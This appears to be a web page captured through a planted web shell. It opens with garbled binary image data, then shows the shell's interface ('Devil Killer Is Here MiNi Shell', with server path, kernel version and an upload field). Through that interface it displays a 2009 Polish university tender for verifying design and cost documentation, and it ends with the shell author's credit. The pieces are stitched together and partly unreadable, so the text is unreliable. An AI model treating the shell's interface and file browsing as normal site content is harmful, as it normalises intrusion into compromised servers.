JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090601/172942-N-2009.html

<p class="kh_header"><b>Wrocław: Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS - 2 ZADANIA.</b><br>
<b>Numer ogłoszenia: 172942 - 2009; data zamieszczenia: 01.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Wrocławska , ul. Wybrzeże Wyspiańskiego 27, 50-370 Wrocław, woj. dolnośląskie, tel. 071 3202182,3203145, faks 071 3202143.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://przetargi.ac.pwr.wroc.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS - 2 ZADANIA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS.
2.Zamówienie obejmuje weryfikację dokumentacji projektowo-kosztorysowej dla dwóch zadań składających się na inwestycję jw.:
Zadanie 1: Centrum Studiów Zaawansowanych Technik Informacyjnych i Komunikacyjnych, zlokalizowane przy ul. Janiszewskiego we Wrocławiu, 
Zadanie 2: Centrum Edukacyjno-Technologiczne zlokalizowane przy ul. Długiej we Wrocławiu.
 
W skład dokumentacji projektowo-kosztorysowej podlegającej weryfikacji wchodzą:
a)	dokumentacja projektowa, na którą składają się:
projekt budowlany
projekt wykonawczy,
przedmiar robót,
b)	inne opracowania
kosztorys inwestorski,
specyfikacja techniczna wykonania i odbioru robót.
W ramach weryfikacji należy dokonać sprawdzenia dokumentacji projektowo-kosztorysowej pod względem zgodności z przepisami i normami, zgodności z wymaganiami technicznymi Zamawiającego, prawidłowości technicznej przyjętych rozwiązań oraz ich funkcjonalności, przez osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności. W ramach zadania należy również sprawdzić kompletność dokumentacji, koordynację międzybranżową, zgodność opracowanego projektu wykonawczego z projektem budowlanym. Należy również dla obu inwestycji zweryfikować przedmiary i kosztorysy w zakresie kompletności i zasadności przyjętych rodzajów robót w oparciu o dokumentację oraz dokonać oceny realności kosztów realizacji wyliczonych w kosztorysie inwestorskim, przez kosztorysantów. 
Weryfikacja winna być wielokrotna, obejmująca również sprawdzenie uwzględnionych przez projektanta kolejnych poprawek i uwag, czyli do momentu odebrania dokumentacji projektowo-kosztorysowej bez uwag. 
Dokumentacje projektowo-kosztorysowe wykonują dwie oddzielne jednostki projektowe, w różnych terminach.
Szczegółowy opis zamawianych usług zawiera wzór umowy (załącznik nr 2 do SIWZ).

Zadanie 1:
Zakres inwestycji obejmuje realizację budynku, dobudowę łącznika i zmiany w budynku istniejącym wynikające z włączenia realizowanego budynku wraz z niezbędną infrastrukturą techniczną (w tym sieci i przyłącza wraz z konieczną przebudową istniejącego uzbrojenia terenu, droga wewnętrzna oraz parking), zagospodarowanie terenu lokalizacji oraz wyposażenie w meble i sprzęt komputerowy.

Szacunkowe dane techniczne: 
Powierzchnia zabudowy 1 480 m2
Powierzchnia całkowita 7 550 m2
Kubatura 29 060 m3
Ilość kondygnacji podziemnych - 1
Ilość kondygnacji nadziemnych - 4
Liczba użytkowników ok. 700 osób

Zadanie 2:
Zakres inwestycji obejmuje wykonanie niezbędnych rozbiórek, realizację nowego budynku wraz z łącznikiem do istniejącego budynku, infrastrukturę techniczną (przebudowa sieci zewnętrznych, wykonanie przyłączy, fragment drogi i parking), zagospodarowanie terenu oraz wyposażenie w meble, sprzęt komputerowy i aparaturę. 

Szacunkowe dane techniczne: 
Powierzchnia zabudowy 2 380m2
Powierzchnia całkowita ok. 3 600 m2
Kubatura 20 540,90 m3
Ilość kondygnacji podziemnych - 0
Ilość kondygnacji nadziemnych - 2/3 
Liczba użytkowników ok. 230 osób.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zadanie 1: 	5.800,00 PLN
Zadanie 2:	3.100,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymogi art. 22 Ustawy Prawo zamówień publicznych, warunki określone w SIWZ i załącznikach oraz posiadają uprawnienia do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 uPzp.
Warunki, które muszą spełniać Wykonawcy ubiegający się o zamówienie oraz wykaz dokumentów i oświadczeń potwierdzających spełnienie warunków.
1. POSIADAJĄ UPRAWNIENIA DO WYKONYWANIA OKREŚLONEJ DZIAŁALNOŚCI LUB CZYNNOŚCI OBJĘTYCH NINIEJSZYM ZAMÓWIENIEM ORAZ NIE PODLEGAJĄ WYKLUCZENIU Z POSTĘPOWANIA NA PODSTAWIE ART. 24 UPZP.
2. POSIADAJĄ NIEZBĘDNĄ WIEDZĘ I DOŚWIADCZENIE ORAZ, 
tj. wykonali (zaprojektowali) lub sprawdzili w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, 
co najmniej 2 dokumentacje projektowe dla obiektów o charakterze użyteczności publicznej, które uzyskały pozwolenie na budowę, z czego co najmniej jeden obiekt ma powierzchnię całkowitą:
dla Zadania nr 1 - min. 5.000 m2
dla Zadania nr 2 - min. 2.000 m2.
3. DYSPONUJĄ OSOBAMI ZDOLNYMI DO WYKONANIA ZAMÓWIENIA LUB POSIADAJĄ PISEMNE ZOBOWIĄZANIE INNYCH PODMIOTÓW DO UDOSTĘPNIENIA OSÓB ZDOLNYCH DO WYKONANIA ZAMÓWIENIA, tj. wskażą
1. Osoby posiadające kwalifikacje zawodowe, doświadczenie i uprawnienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (TJ Dz.U. z 2006 r. nr 156, poz. 1118 z późn. zm.) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. nr 5, poz. 42 z późn. zm.) a w szczególności:
osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w specjalnościach:
a)	architektonicznej (architekt)
b)	konstrukcyjno-budowlanej (konstruktor)
c)	drogowej
d)	telekomunikacyjnej
e)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych 
f)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
posiadające aktualne zaświadczenia o przynależności do właściwej Izby Samorządu Zawodowego oraz posiadające odpowiednie niezbędne doświadczenie, tj.:
- architekt, konstruktor, projektanci specjalności instalacyjnej i sieciowej (dot. pkt 1 a, b, e, f) (każdy z nich) wykonał (zaprojektował) lub sprawdził w ciągu ostatnich 5 lat, co najmniej 2 dokumentacje projektowe dla obiektów o charakterze użyteczności publicznej w tym jeden obiekt o powierzchni całkowitej:
dla Zadania nr 1 - min. 5.000 m2
dla Zadania nr 2 - min. 2.000 m2.
- projektant specjalności drogowej i telekomunikacyjnej (każdy z nich) wykonał (zaprojektował) lub w ciągu ostatnich 5 lat, co najmniej 2 projekty w tej specjalności.
2.Kosztorysanta/ów posiadającego/ych doświadczenie w opracowaniu - w ciągu ostatnich 5 lat - co najmniej 2 kosztorysów inwestorskich dla obiektów o charakterze użyteczności publicznej w tym jeden o powierzchni całkowitej:
dla Zadania nr 1 - min. 5.000 m2
dla Zadania nr 2 - min. 2.000 m2.
3.Osobę do pełnienia funkcji rzeczoznawcy do spraw zabezpieczeń przeciwpożarowych powołaną przez Komendanta Głównego Państwowej Straży Pożarnej oraz posiadającą odpowiednie niezbędne doświadczenie, tj.:
- uzgodnili co najmniej trzy projekty budowlane obiektu użyteczności publicznej pod względem ochrony przeciwpożarowej zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16 czerwca 2003 r. (Dz.U. 03.121.1137).

Za obiekty o charakterze użyteczności publicznej rozumie się obiekty w rozumieniu Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych - PKOB - Dz.U.99.112.1316 z późn. zm.
- sekcja 1, dział 12, grupa:
121 (Hotele i budynki zakwaterowania turystycznego)
122 (Budynki biurowe)
123 (Budynki handlowo-usługowe)
126 (Ogólnodostępne obiekty kulturalne, budynki o charakterze edukacyjnym, budynki szpitali i zakładów opieki medycznej oraz budynki kultury fizycznej).

Wykonawca, który złoży jednocześnie ofertę na zadanie nr 1 i 2 wystarczy, że spełni warunek dla zadania nr 1.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 poz. A niniejszego rozdziału, składa odpowiednie dokumenty, wystawione zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 24 maja 2006 Nr 87, poz. 605).

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą: spełnia - nie spełnia na podstawie złożonej oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenia z art. 22 uPzp - załącznik nr 3 i załącznik nr 4.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Gdy oferta podpisana zostanie przez inną osobę w wyniku udzielonego pełnomocnictwa, do oferty należy dołączyć pełnomocnictwo udzielone przez osobę (osoby) do tego upoważnioną. Pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza
3. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.
4. Dokument/-y potwierdzający/-e, że usługi zostały wykonane należycie.
5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
6. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają:
wymagane uprawnienia oraz przynależność do właściwej Izby Samorządu Zawodowego - pkt 1 warunków,
powołanie do sprawowania funkcji rzeczoznawcy do spraw zabezpieczeń przeciwpożarowych przez Komendanta Głównego Państwowej Straży Pożarnej) - pkt 3 warunków..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://przetargi.ac.pwr.wroc.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Zamawiającego, 200 zł na pisemny wniosek Wykonawcy w siedzibie Biura Zamówień Publicznych Politechniki Wrocławskiej lub za zaliczeniem pocztowym...</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 11:00, miejsce: Siedziba Biura Zamówień Publicznych Politechniki Wrocławskiej, ul. Norwida 9/1, 50-370 Wrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS.
Zadanie 1: Centrum Studiów Zaawansowanych Technik Informacyjnych i Komunikacyjnych, zlokalizowane przy ul. Janiszewskiego we Wrocławiu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS.
Zadanie 1: Centrum Studiów Zaawansowanych Technik Informacyjnych i Komunikacyjnych, zlokalizowane przy ul. Janiszewskiego we Wrocławiu, 
W skład dokumentacji projektowo-kosztorysowej podlegającej weryfikacji wchodzą:
a)	dokumentacja projektowa, na którą składają się:
projekt budowlany
projekt wykonawczy,
przedmiar robót,
b)	inne opracowania
kosztorys inwestorski,
specyfikacja techniczna wykonania i odbioru robót.

W ramach weryfikacji należy dokonać sprawdzenia dokumentacji projektowo-kosztorysowej pod względem zgodności z przepisami i normami, zgodności z wymaganiami technicznymi Zamawiającego, prawidłowości technicznej przyjętych rozwiązań oraz ich funkcjonalności, przez osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności. W ramach zadania należy również sprawdzić kompletność dokumentacji, koordynację międzybranżową, zgodność opracowanego projektu wykonawczego z projektem budowlanym. Należy również dla obu inwestycji zweryfikować przedmiary i kosztorysy w zakresie kompletności i zasadności przyjętych rodzajów robót w oparciu o dokumentację oraz dokonać oceny realności kosztów realizacji wyliczonych w kosztorysie inwestorskim, przez kosztorysantów. 
Weryfikacja winna być wielokrotna, obejmująca również sprawdzenie uwzględnionych przez projektanta kolejnych poprawek i uwag, czyli do momentu odebrania dokumentacji projektowo-kosztorysowej bez uwag. 
Dokumentacje projektowo-kosztorysowe wykonują dwie oddzielne jednostki projektowe, w różnych terminach.
Szczegółowy opis zamawianych usług zawiera wzór umowy (załącznik nr 2 do SIWZ).

Zadanie 1:
Zakres inwestycji obejmuje realizację budynku, dobudowę łącznika i zmiany w budynku istniejącym wynikające z włączenia realizowanego budynku wraz z niezbędną infrastrukturą techniczną (w tym sieci i przyłącza wraz z konieczną przebudową istniejącego uzbrojenia terenu, droga wewnętrzna oraz parking), zagospodarowanie terenu lokalizacji oraz wyposażenie w meble i sprzęt komputerowy.

Szacunkowe dane techniczne: 
Powierzchnia zabudowy 1 480 m2
Powierzchnia całkowita 7 550 m2
Kubatura 29 060 m3
Ilość kondygnacji podziemnych - 1
Ilość kondygnacji nadziemnych - 4
Liczba użytkowników ok. 700 osób

Termin realizacji przedmiotu zamówienia: pierwsza weryfikacja do 7 tygodni od dnia przekazania dokumentacji, kolejne weryfikacje w terminie dwustronnie uzgodnionym, lecz nie dłuższym niż 2 tygodnie od dnia przekazania dokumentacji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS.
Zadanie 2: Centrum Edukacyjno-Technologiczne zlokalizowane przy ul. Długiej we Wrocławiu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest weryfikacja dokumentacji projektowo-kosztorysowej dla inwestycji o nazwie Międzyuczelniane Centrum Dydaktyczno-Technologiczne TECHNOPOLIS.
Zadanie 2: Centrum Edukacyjno-Technologiczne zlokalizowane przy ul. Długiej we Wrocławiu.
 
W skład dokumentacji projektowo-kosztorysowej podlegającej weryfikacji wchodzą:
a)	dokumentacja projektowa, na którą składają się:
projekt budowlany
projekt wykonawczy,
przedmiar robót,
b)	inne opracowania
kosztorys inwestorski,
specyfikacja techniczna wykonania i odbioru robót.

W ramach weryfikacji należy dokonać sprawdzenia dokumentacji projektowo-kosztorysowej pod względem zgodności z przepisami i normami, zgodności z wymaganiami technicznymi Zamawiającego, prawidłowości technicznej przyjętych rozwiązań oraz ich funkcjonalności, przez osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności. W ramach zadania należy również sprawdzić kompletność dokumentacji, koordynację międzybranżową, zgodność opracowanego projektu wykonawczego z projektem budowlanym. Należy również dla obu inwestycji zweryfikować przedmiary i kosztorysy w zakresie kompletności i zasadności przyjętych rodzajów robót w oparciu o dokumentację oraz dokonać oceny realności kosztów realizacji wyliczonych w kosztorysie inwestorskim, przez kosztorysantów. 
Weryfikacja winna być wielokrotna, obejmująca również sprawdzenie uwzględnionych przez projektanta kolejnych poprawek i uwag, czyli do momentu odebrania dokumentacji projektowo-kosztorysowej bez uwag. 
Dokumentacje projektowo-kosztorysowe wykonują dwie oddzielne jednostki projektowe, w różnych terminach.
Szczegółowy opis zamawianych usług zawiera wzór umowy (załącznik nr 2 do SIWZ).

Zadanie 2:
Zakres inwestycji obejmuje wykonanie niezbędnych rozbiórek, realizację nowego budynku wraz z łącznikiem do istniejącego budynku, infrastrukturę techniczną (przebudowa sieci zewnętrznych, wykonanie przyłączy, fragment drogi i parking), zagospodarowanie terenu oraz wyposażenie w meble, sprzęt komputerowy i aparaturę. 

Szacunkowe dane techniczne: 
Powierzchnia zabudowy 2 380m2
Powierzchnia całkowita ok. 3 600 m2
Kubatura 20 540,90 m3
Ilość kondygnacji podziemnych - 0
Ilość kondygnacji nadziemnych - 2/3 
Liczba użytkowników ok. 230 osób

Termin realizacji przedmiotu zamówienia: pierwsza weryfikacja do 7 tygodni od dnia przekazania dokumentacji, kolejne weryfikacje w terminie dwustronnie uzgodnionym, lecz nie dłuższym niż 2 tygodnie od dnia przekazania dokumentacji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com